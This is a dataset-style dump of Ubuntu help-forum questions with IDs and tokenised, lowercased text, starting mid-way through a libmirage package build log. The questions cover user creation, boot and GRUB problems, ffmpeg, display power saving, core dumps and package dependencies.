/home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragecdtextcoder.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/home.png -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/mirageplugin.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/up.png -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/index.sgml -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/right.png -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragetrack.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage-error.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/mirageparser.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/mirageindex.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragelanguage.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage.devhelp2 -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/libmirage-utilities.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragefragment.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/index.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/style.css -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragedisc.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/miragecontext.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/gtk-doc/html/libmirage/mirageobject.html -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/pkgconfig/libmirage.pc -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-cso.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-cso.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-daa.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-daa.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-dmg.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-ecm.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-ecm.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-gzip.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-isz.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-isz.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-macbinary.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-sndfile.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/filter-xz.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-b6t.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-b6t.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-c2d.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-c2d.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-ccd.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-ccd.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-cdi.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-cdi.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-cif.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-cif.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-cue.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-harddisk.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-apple.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-iso.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-mds.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-mds.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-mdx.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-mdx.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-nrg.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-nrg.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-readcd.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-toc.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/lib/libmirage-2.1/image-xcdroast.so -- installing : /home/shyaam/downloads/libmirage-2.1.1/debian/tmp/usr/share/mime/packages/libmirage-xcdroast.xml update-mime-database.real : i do n't have write permission on /usr/share/mime . try rerunning me as root . make [ 1 ] : leaving directory `/home/shyaam/downloads/libmirage-2.1.1/obj-i686-linux-gnu' dh_install dh_install : libmirage9 missing files ( usr/lib/*/lib*.so . * ) , aborting make : *** [ binary ] error 255 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 '' also tried this command with sudo .
359712	useradd -p broken in 12.04 lts ?	i have a mail benchmarking application that i need to set up , and part of that includes setting up at least several hundred dummy user accounts . i had this scripted so i could easily recreate the mailstore , like such : # ! /bin/bash new_users= '' ./userlist '' home_base= '' /home/ '' cat $ { new_users } | \ while read user password do useradd -p $ { password } -m -d $ { home_base } $ { user } $ { user } done exit 0 this seemed to work , but then my application freaked out . when i went to check , none of my accounts had working logins ! they all had empty passwords . ( note : the above script worked for a previous install of 12.04 lts server , see below ) i tried just the following : useradd -p pass -m test but that failed similarly . running the password through crypt makes no difference whatsoever . the interesting thing is that the script was working on another install of ubuntu 12.04 server ! it was a slightly different image ( ubuntu-12.04-server-cloudimg-amd64-disk1 as opposed to my current ubuntu-12.04.3-server-amd64 ) , but why would something so basic change in function ( or , it seems , stop working altogether ! ) ? any help would be greatly appreciated as i do not look forward to manually adding hundreds of users . edit : here is some output from /var/log/auth.log : oct 16 01:47:33 mailserver-vm su [ 27735 ] : successful su for ubuntu by root oct 16 01:47:33 mailserver-vm su [ 27735 ] : + /dev/pts/0 root : ubuntu oct 16 01:47:33 mailserver-vm su [ 27735 ] : pam_unix ( su : session ) : session opened for user ubuntu by root ( uid=0 ) oct 16 01:47:36 mailserver-vm su [ 27790 ] : pam_unix ( su : auth ) : authentication failure ; logname=root uid=1000 euid=0 tty=/dev/ pts/0 ruser=ubuntu rhost= user=test1 oct 16 01:47:38 mailserver-vm su [ 27790 ] : pam_authenticate : authentication failure oct 16 01:47:38 mailserver-vm su [ 27790 ] : failed su for test1 by ubuntu oct 16 01:47:38 mailserver-vm su [ 27790 ] : - /dev/pts/0 ubuntu : test1 oct 16 01:47:45 mailserver-vm su [ 27791 ] : pam_unix ( su : auth ) : authentication failure ; logname=root uid=1000 euid=0 tty=/dev/ pts/0 ruser=ubuntu rhost= user=test2 oct 16 01:47:47 mailserver-vm su [ 27791 ] : pam_authenticate : authentication failure oct 16 01:47:47 mailserver-vm su [ 27791 ] : failed su for test2 by ubuntu oct 16 01:47:47 mailserver-vm su [ 27791 ] : - /dev/pts/0 ubuntu : test2 oct 16 01:47:56 mailserver-vm su [ 27792 ] : pam_unix ( su : auth ) : authentication failure ; logname=root uid=1000 euid=0 tty=/dev/ pts/0 ruser=ubuntu rhost= user=test50 oct 16 01:47:59 mailserver-vm su [ 27792 ] : pam_authenticate : authentication failure oct 16 01:47:59 mailserver-vm su [ 27792 ] : failed su for test50 by ubuntu oct 16 01:47:59 mailserver-vm su [ 27792 ] : - /dev/pts/0 ubuntu : test50 as you can see , i attempt an su from root to my normal user account first ( since i need to check if their passwords are working ) . attempting to su into any of the accounts ends in failure , although their password should be set equal to their username ( ie . test1 : test1 , test2 : test2 , ... ) in addition , the accounts are assigned bash : root @ mailserver-vm : ~/scripts # su test1 test1 @ mailserver-vm : /root/scripts $ cd test1 @ mailserver-vm : ~ $ ps -p $ $ pid tty time cmd 31484 pts/0 00:00:00 bash test1 @ mailserver-vm : ~ $ attempting to run the commands myself yields no output whatsoever - the command seemingly completes successfully . for example : here is the output of useradd -p t123 post : root @ mailserver-vm : ~/scripts # useradd -p t123 post root @ mailserver-vm : ~/scripts # root @ mailserver-vm : ~/scripts # su ubuntu ubuntu @ mailserver-vm : /root/scripts $ su post password : < -- - t123 entered su : authentication failure output of grep post /etc/passwd /etc/shadow : /etc/passwd : post : x:1013:1013 : :/home/post : /bin/sh /etc/shadow : post : t123:15994:0:99999:7 : : : for the record , running the password through crypt had the same result . this is the way i did it : # password = whatever # pass= $ ( perl -e 'print crypt ( $ argv [ 0 ] , `` password '' ) ' $ password ) $ useradd -p $ pass user edit : i ended up using chpasswd to change the passwords afterwards , but i 'm still baffled as to why useradd -p stopped working from a previous 12.04 install . i could n't really find anything relevant ( perhaps an update discarded cleartext input for the password field , as gertvdijk said below . although i 've fixed my issue , if anyone wishes to provide an answer to the original question i would gladly accept it .
359713	how to check s.m.a.r.t. , hdd performance etc , on vps	there are a little bit problem . on local machine ( own ) , all works fine , but , since i moved my projects to vps ( you know , internet all the time , electricy backups and so on ) , i notified , that a lot of programs are n't work or are n't work properly . i could n't check smart on my vps sudo apt-get install smartmontools sudo smartctl -- all /dev/sda results : smartctl open device : /dev/sda failed : no such device so , how can i check smart and performance on vps ?
359717	does n't appear the ubuntu option	i 'm not an english native and kind of newbie in this kind of things so i will do my best to explain myself as clear as possible . i just downloaded the wubi , went throgh all the instalation progress , restart the pc , but the ubuntu option just does n't appear . i 've already tried with a liveusb but does n't work either . used the easy bcd but since my current iso is windows xp it really does n't work for me . so my question is , am i doing something wrong ? forgetting some steps or something like that ? i just want to have a dual system start option . pleas i will apreciate any kind of help . thank you .
359719	ffmpeg - create a mp3 file with album art from an mkv file	i want to create an mp3 file from a given mkv file using ffmpeg the output of ffmpeg -i is as follows seems stream 0 codec frame rate differs from container frame rate : 59.94 ( 2000000/33367 ) - > 29.97 ( 30000/1001 ) input # 0 , matroska , webm , from 'spiral - 09.mkv ' : duration : 00:23:09.65 , start : 0.000000 , bitrate : n/a chapter # 0.0 : start 0.097000 , end 1389.654000 metadata : title : 00:00:00.097 stream # 0.0 : video : h264 ( high ) , yuv420p , 640x428 , par 1:1 dar 160:107 , 23.98 fps , 29.97 tbr , 1k tbn , 59.94 tbc ( default ) stream # 0.1 ( jpn ) : audio : aac , 48000 hz , stereo , s16 ( default ) stream # 0.2 : audio : aac , 48000 hz , stereo , s16 stream # 0.3 : subtitle : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 ( default ) now i used the following command to create the file . my aim is to get a portion of audio and an image snapshot from the input file and use these as the audio stream and album art for the output file . ffmpeg -i spiral\ -\ 09.mkv \ -map 0:0 -map 0:1\ -c : v -ss 00:01:30 -vframes 1\ -c : a:0 mp3 -b : a:0 128k\ out.mp3 but , i get the following error . seems stream 0 codec frame rate differs from container frame rate : 59.94 ( 2000000/33367 ) - > 29.97 ( 30000/1001 ) input # 0 , matroska , webm , from 'spiral - 09.mkv ' : duration : 00:23:09.65 , start : 0.000000 , bitrate : n/a chapter # 0.0 : start 0.097000 , end 1389.654000 metadata : title : 00:00:00.097 stream # 0.0 : video : h264 ( high ) , yuv420p , 640x428 , par 1:1 dar 160:107 , 23.98 fps , 29.97 tbr , 1k tbn , 59.94 tbc ( default ) stream # 0.1 ( jpn ) : audio : aac , 48000 hz , stereo , s16 ( default ) stream # 0.2 : audio : aac , 48000 hz , stereo , s16 stream # 0.3 : subtitle : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 ( default ) expected number for vframes but found : 1-c : a:0 is my way of handling streams correct here ? if so , what else could be the problem .
359720	can not boot windows discs or usbs on second partition ( ntfs )	tried every program on the net to mount windows to usb . either none work or just not on my dell quad . borrowed a cd after 8 hours and 2 days of useless toil with my iso . it just flat wo n't boot whether i use boot options , bios settings , or both . with the usb , it says `` attempting '' meaning ca n't and keeps attempting until i shut down . the cd says its booting and then opens the os options . all the ubunto is normal . 2 choices : boot ubunto or shut down by switch . even went out to a cafe and used windows there with power iso ( winto was useless as unet ) for a bonus wasted aggravating hour . my last resort is to switch all my stuff from another partition ( i 've 3 40 g. ) and remove my 40g . from the computer entirely , find another computer with windows where they will allow me to install the drive ( 2 week search ? ) install all normally . reinstall it to my computer . change the drivers for my computer if it does n't just freeze . looks very much like something in ubunto is blocking installation . should i just throw ubuntu to the curb and install mint or red hat or something ? if ubunto flat do n't allow it , what linux will ? or bsd ? very bored and it sounds better than dismantling my computer and searching the planet . please help . usta like ubunto .
359726	wifi configuration problem ?	i created a question before : wifi is fine on ubuntu but very slow on window 7 and i found a solution by running this command : sudo modprobe -r b44 b43 b43legacy ssb brcmsmac wl || sudo modprobe brcmsmac but everytime i restart my computer , i must run it again . if not , other computer in my network will have slow connection . and my questions are : 1 . why wl mode is the reason ? 2 . how to set permanently this configuration ? thank for your attention : - )
359727	does ubuntu precise desktop 12.04 supports memory managment unit ( mmu ) by default ?	does ubuntu precise desktop 12.04 ( 32 bit ) kernel has built-in default support for mmu ? is there any way to configure/disable/verify it ? thank you !
359728	unable to change theme in gnome 3.8.3	i want to change my gnome shell , and i am using ubuntu 13.04 with gnome 3.8.3 i do n't know how to change , i search in google but still i did n't get what i want . this is how its look like in my pc , i want to make it like that , in the first image the applications , places is on the top panel , and in the second image it is not in the panel , so i want to make like the second image , please tell how to do this ? thanks in advance
359729	ubuntu 12.04 will only boot up randomly	this should probably be a bug but i 'm not sure if it fits with the bugs guidelines or not so i will put it her . first , for the record , i use ubuntu 12.04 on several machines and only one is displaying this behavior . the machine in question is a dell latitude 2110 purchased about three years ago by the company . we used to dual boot it with windows but this month the decision was finally made to take windows off of the company 's machines and just use ubuntu . when the machine was dual boot there was never a problem . after backing up all our data we wiped the hard drive and installed ubuntu from the 12.04.3 image . the first few boots after instillation were fine but on the third day of using the machine it will boot to a black screen . we were able to determine that the system was still running on the system but we just could n't see what it was doing . pressing the power button and then enter would shut the machine down . the machine boots to a black screen most of the time . about once in ever five attempts to boot the machine it will randomly boot as normal . when this happens we see purple then it goes black and we see : [ 10.728739 ] info qwl_cfg80211_attach : registered cfg80211 phy flash for a moment on the screen . when this happens , the machine boot normally and the unity desktop displays the correct resolution for the screen . we have figured out how to force the machine t boot by holding down shift during boot so bring up grub . if we select safe boot but then cancel it and choose to boot normally the machine will turn grey , and then the top bar comes , followed by the purple background , and finally the sidebar . however , when this is done , the desktop is not the correct resolution for the screen and moving the cursor to the edges of the screen causes the desktop to shift position . as of yet , there is no third party software on the computer and not changes have been made to the os . we are thinking to just wipe the hard drive again and install again from scratch but that will just be a waste of time if it wo n't fix the problem . has anyone else encountered this ? is there a fix for it ?
359730	i need to build a deb package which ask and installs other a deb packages	i need create a deb package which asks me to install some other package to be installed or not . and if yes which version of you want to install . what should be the right place for this , a control file of any other script file ? the output should be : sudo apt-get install xyz.deb installing ... ... ... ... ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . do you want to install abc1 package y/n ? ( xyz depends on any version of abc1 . so , we have options to update it or leave it as it is ) y enter the version 1.3.2 installing abc1_1.3.2 ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... ... . do you want to install abc2 package y/n ? n ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .
359733	where is mailer.py ?	i 'm setting up a subversion server and need to send email to users on post commit . i can see a sample post-commit hook which includes `` mailer.py '' . that file does n't seem to exist . i can see lots of people via google who have set this up , and want answers about more complex setups . i ca n't see any info about where mailer.py is , and how to actually use it . can anyone direct me how to set up the basics ?
359736	password problems in ubuntu 13.04	ubuntu keeps asking me for my password to log in to my account when i enter the correct password , it asks for it again and will not accept it . id does tell me if it 's incorrect when i enter wrong password , though . can anyone help please ?
359737	cloning only used part of ext4 partition	i have a 320gb hdd . 100gb holds / , out of which only 30gb is used , and rest holds /mnt . i am planning to buy a 64gb ssd . and i can only use one hdd at a time . how can i create an image of that 30gb used space only , in an external drive and restore it by plugging in the ssd ? clonezilla seems to backup the whole disc , not just the partition . same with dd it seems .
359738	ubuntu 12.04 lts autoupdate kills system	just installed the current updates on my hp nx6310 as suggested by the system . i hesitated for a few days , because the lst update killed all my network interfaces , wired and wireless . i decided to install the updates , because of probable security issues with the old versions and , tataaaa black screen of death , no reaction - > reboot the only thing that looked something like human readable in the stack trace was `` modprobe '' the rest was only timecode and hex words . after a reboot , the desktop came up again , just took much longer than before ( i hate updates ) . all my networks are gone again , butthere is a new message in my collection : '' die netzwerkdienste des systems sind mit dieser version nicht kompatible . '' something like '' the network services of the system are not compatible with this version . '' wow , my linux killed itself , that is ai . how can i now restore the system to work again ? how can i tell the system to not install updates that will destroy it ? would be nice if there was someone who can help . thx
359740	how to upgrade to a newer release of ubuntu using the live cd ?	i 've downloaded ubuntu 13.10 daily cd and i want to upgrade all my computers using this live cd ( they all run ubuntu 13.04 presently ) . how can i upgrade to ubuntu 13.10 exploiting the packages in the cd ? is there any standard procedure for this ? i tried this : i rebooted into live cd , searching for an option like `` upgrade from 13.04 to 13.10 '' ( i think it used to appear in the alternate cd ) but found nothing like that . -edit- even if the option is not present it is possible to `` mimic it '' by entering manual partitioning and tell ubuntu to reuse the existing partitions without formatting them . ubuntu will keep user 's data and install the updated software . nevertheless this is not a viable solution because after the upgrade one has to reinstall all the programs he needs , since it is like having a vanilla ubuntu . i booted into ubuntu 13.04 and added the cd to my software sources . i then proceeded with the upgrade however the cd was never accessed and everything was downloaded from the web . i know , i know ... i have other options rather than using the live cd , namely : forget the cd and setup apt-cacher in the lan copy the deb files from the cd into /var/cache/apt/archives/ but this looks unreasonable to me ... why ca n't i insert the cd and exploit its contents ? i would like to avoid apt-cacher and if possible avoid also manually copying the packages . any idea on how to accomplish this ?
359746	command line for guis that are found in the menu bar/dash	i would like to know how i would find out the command-line to start applications like gnome-control-center or the network applet . i often find posts in the forums that give some command-lines ; i do not know however , how i would find out these command-lines by myself , given just the running application that i started using the menu bar or the search thing in the top right . for example , i start the search and type user , and i get an application that calls itself '' user accounts '' in the top part of the frame of the window . i do not find out , given this application , what command-line would launch exactly this application . how do i find that out , given all and any applications that i might find using the search thing ? thanks a lot !
359750	i have an hp pavilion dv4 1225dx - not connecting wirelessly - will ethernet still solve this problem in the long run ?	so i do not have really any knowledge about advanced or intermediate ways to go about fixing problems such as the one i 'm mentioning , so i apologize that i am asking a duplicated question . i just do not have any understanding of the solutions given in the other answers , as lists of code are in them , and i am downloading ubuntu 13 as a new user of linux , and really wanting to stray away from my windows os due to lots of undesirable issues . so , my question is : if i connect my computer with an ethernet cable to overwrite windows and install ubuntu , are there chances that once i do so i will still not be able to connect wirelessly ? at this point my laptop will not allow for me to connect wirelessly in the try mode , and therefore wo n't allow me to connect to the internet to install ubuntu . i am worried that if i do connect it to the internet through an ethernet cable and install ubuntu , that i will still be left with a wifi connectivity issue , and a new os that ca n't connect to the internet without an ethernet cable . an overly simplified , even childlike explanation of this solution would be greatly appreciated . as i said , i have no previous use of linux , or coding , or working with a computer on the level that i am seeing that the other solutions to this problem are presenting , and just want to make sure that if i am able to install through an ethernet connection that at the other end of the os tunnel i will have wifi capabilities immediately , or with some mild work . thanks so much ! -- -helpless noob
359752	disabling monitor power save in ubuntu 11.10	i know the question that i have posted seems repetitious based on the fact that there are several answers out there . the problem is that i have tried all that i could find and none of them work with a permanent solution . one of my tries are : gsettings set org.gnome.settings-daemon.plugins.power active false [ did not work ] next i tried over ssh when the display was in power saver mode seemed more promising was : export display=:0.0 xset -dpms this worked and turned my display on . i even ran xset -q and it showed that the dpms is disabled : dpms ( energy star ) : standby : 600 suspend : 600 off : 600 dpms is disabled but upon reboot dpms was enabled so i added this setting in a start-up script and then the setting always showed dpms is disabled after reboot . but even when dpms was disabled after 10 minutes the monitor went into power save . now this is the funny thing , when the monitor is in power save , i ssh-ed and ran the same commands ... export display=:0.0 xset -dpms ... the monitor then came on and remained on forever and seemed that the command was working . however upon reboot everything was the same . anyone have any ideas ?
359753	`gtk-warning ** : locale not supported by c library . ` when starting apps from the commandline	i did n't get an answer but i was n't doing anything and this is an interesting topic . in ubuntu 12.04 , when opening a file in gedit or if i am working on the command line in dpkg , i get returned the error `` locale not supported , falling back to default `` c '' libraries '' , and the one below , gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale .
359754	when choosing option alongside windows , system restarts	i have an hp pavilion g6 ( amd a8 processor ) , running windows 7 ultimate . when i try to install ubuntu alongside windows the system just restarts . i have the same problem with ubuntu 13.04 . can anybody tell me the reason and solution . i have 40gb of free disk space .
359756	prevent user from executing history -c command in shell	is it possible to prevent specific user from executing history -c command in shell .
359758	how to install gnome 's global dark theme in ubuntu 13.10	i have checked many many many dark themes but nothing comes even close to gnome 's global dark theme ( the one you activate through gnome-tweak-tool ) . it 's simple and elegant . especially nautilus looks great . is there a way i can i have it in ubuntu ( with unity ) ?
359762	no password required in xubuntu after waking up	i am experiencing a very frustrating issue while running xubuntu 13.04 . it seems like xubuntu does not need to require the password , when pulling the lid over . i already tried to search for a fix on the world wide web : unfortunately , i did not find any working solution about it . then , i decided to search on ask ubuntu for a conceivable settlement : i read about a similar issue right in this thread - > xubuntu : no password request after suspension i tried to follow both of the solutions therein listed , but ( unfortunately ) i had no luck in solving the problem . can you kindly consider to help me finding a better elucidation ? thank you so much in advance .
359763	eclipse ( cdt ) - cant find source at	i am an eclipse ( cdt ) and ubuntu ( 13.04 ) user . i am working on a c project in eclipse in ubuntu . i ran my c project in my eclipse in ubuntu . i faced no compilation errors , but i am not receiving the intended result . the weird part is , the program stops in the middle of the printf statement . i suspected a seg fault in some earlier part of the program . however when i ran the same c project in eclipse in my team mate 's laptop ( mac ) , it works fine with the exact intended result . the code worked fine in both our laptops till about 2 days back and i dint freshly install anything in my laptop or changed any of the properties in my eclipse . to check this , i ran the same project in my friend 's laptop ( ubuntu ) , and it dint run in that either . when i am trying to run this using a debugger , i get this error , ca n't find a source file at `` /build/buildd/eglibc-2.17/malloc/malloc.c '' locate the file or edit the source lookup path to include its location . it would be great if anyone could help me with this . regards , mani
359765	ca n't change themes in cinnamon session after an update - ubuntu 13.04	i was happily using cinnamon until today , when ubuntu suggested i update it . i do admit i did n't read what the update was about , and just let it run . problem is that now after a reboot , the cinnamon session wo n't use the theme i was already using and it wo n't let me change to anything else than the standard theme , including icons , gtk and window themes . what bothers me is that if i log with a gnome fallback session or a unity session , i can change back to the theme i was using . as soon as i go back to cinnamon though i 'm stuck with the standard one . trying to change the theme with gnome tweak tool does absolutely nothing . also , i get an error message that informs that nemo has crashed with sigabrt in raise ( ) . i tried removing ( sudo apt-get -- purge autoremove cinnamon ) and reinstaling it , but nothing changed . what can i do to go back to my old looks ?
359766	installing ubuntu 13.04 on an imac	this is my second time to try to install ubuntu on my imac . currently , i 'm downloading the amd64 mac version of ubuntu 13.04 because months ago , my imac just lost all it 's data and i do n't have a lion installation disk ( nor do i want to use it anymore since i 'm sick of mac ) , so is it possible to install raring ringtail amd64 mac on a late-2009 imac ? back in june , i made this post ( i lost my original account to these forums , sorry ) ca n't install ubuntu on my imac , so if you need that for a reference ( my past experience on trying to install 12.04 lts on an imac ) . specifications are below if you need them : cpu : intel i5 gpu : ati radeon 4850 hd ram : 12 gb ram
359767	running a adobe air application on a headless remote server	i am trying to install an adobe air file running ssh in a terminal ( no gui ) : sudo adobe\ air\ application\ installer -silent -eulaaccepted myairapp.air but i receive the following error : ( adobe air application installer:7509 ) : gtk-warning ** : can not open display : how can this be done ? edit : this command is being run remotely using ssh
359770	core only dumped upon receiving sigquit	learning about signals , i found out that calling the < stdlib.h > functionabort ( void ) ; in a c program , which roughly equals to raising a sigabrt signal , does n't create a core file on my ubuntu 13.04 despite having set ulimit -c to unlimited and receiving a core dumped message . following the signal ( 7 ) manpage , i killed a running instance of yes with all the signals marked with the core flag , whose default action is declared to be the termination of the process and dumping the core . out of all the signals mentioned ( sigill , sigabrt , sigfpe , sigsegv , sigbus , sigsys , sigtrap , sigxcpu , sigxfsz , sigiot , sigquit ) , however , only sigquit caused the creation of a core file . is this documented and / or configurable behaviour , or is it a quirk ?
359772	openshot video editor doesnt starts	i downloaded openshot video editor . after the installation was finished i tried to open it . but after the icons animation ( you know with the flashing ) ended . nothing happened . i tried it more times but unfortunately it didnt started .
359775	grub is not showing ubuntu after installing redhat 6.0	i had installed redhat 6.0 over ubuntu 13.04 and now ubuntu is not showing in grub list . i have tried following : ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x50465045 device boot start end blocks id system /dev/sda1 * 63 163846934 81923436 7 hpfs/ntfs/exfat /dev/sda2 163846996 625141759 230647382 f w95 ext 'd ( lba ) /dev/sda5 393224192 625141759 115958784 83 linux /dev/sda6 163850240 393222143 114685952 83 linux partition table entries are not in disk order disk /dev/sdb : 4233 mb , 4233101312 bytes 255 heads , 63 sectors/track , 514 cylinders , total 8267776 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe04d8de0 device boot start end blocks id system /dev/sdb1 * 63 8267775 4133856+ b w95 fat32 ubuntu @ ubuntu : ~ $ sudo mount /dev/sda5 /mnt ubuntu @ ubuntu : ~ $ sudo mount -- bind /dev /mnt/dev ubuntu @ ubuntu : ~ $ sudo mount -- bind /sys /mnt/sys ubuntu @ ubuntu : ~ $ sudo mount -- bind /proc /mnt/proc ubuntu @ ubuntu : ~ $ sudo chroot /mnt root @ ubuntu : / # cd /boot/grub/ root @ ubuntu : /boot/grub # ls fonts gfxblacklist.txt grub.cfg grubenv i386-pc locale root @ ubuntu : /boot/grub # sudo update-grub sudo : unable to resolve host ubuntu generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin found windows nt/2000/xp on /dev/sda1 found red hat enterprise linux server release 6.0 ( santiago ) on /dev/sda6 done
359776	how do i move the launcher to another screen ?	i have physically swapped the my two screens around and have used the display setting to switch them so that the mouse moves between the two screens in the expected way . but now the launcher is attached to the screen on the right , so how can i move it to the left screen ?
359779	google chrome installation , dependency is not satisfiable : lib32gcc1	i tried to install google chrome on 12.04 and i get the following message : dependency is not satisfiable : lib32gcc1 ( > =1:4.1.1 ) i am pretty new to ubuntu , so i do n't know what to do . any ideas ?
